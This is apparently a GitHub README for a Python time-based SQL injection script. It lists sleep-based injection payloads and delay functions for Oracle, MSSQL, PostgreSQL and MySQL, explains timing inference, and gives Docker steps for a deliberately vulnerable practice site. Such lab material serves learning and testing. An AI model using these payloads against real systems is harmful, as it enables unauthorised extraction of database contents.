Skip to content

Rexturnull/Time-based-SQL-Injeciton-Script

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

Time-based-SQL-Injeciton-Script

This is my first Python attack script, so it still requires parameterization. You need to actively modify the function used in the main part of the code and pass the parameters.

Time-based-SQL-Injeciton

' or sleep(3)
abc' or sleep(3) and 'a'='a
Oracle      dbms_pipe.receive_message(('a'),10)
MSSQL       WAITFOR DELAY '0:0:10'
PostgreSQL  SELECT pg_sleep(10)
MySQL       SELECT sleep(10)

It involves sending SQL queries to the database that force it to wait for a specified amount of time before responding. By measuring the server's response time, an attacker can infer whether certain conditions are true or false, thereby extracting information from the database without direct feedback.

Docker

Build Enviroment on Ubuntu

And you will get a simple website that has a time-based SQL injection vulnerability.

chmod 744 *

docker-compose build

docker-compose up

Stop and Remove All Containers

docker stop $(docker ps -q)
docker rm $(docker ps -a -q)

About

Time-based-SQL-Injeciton-Script

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published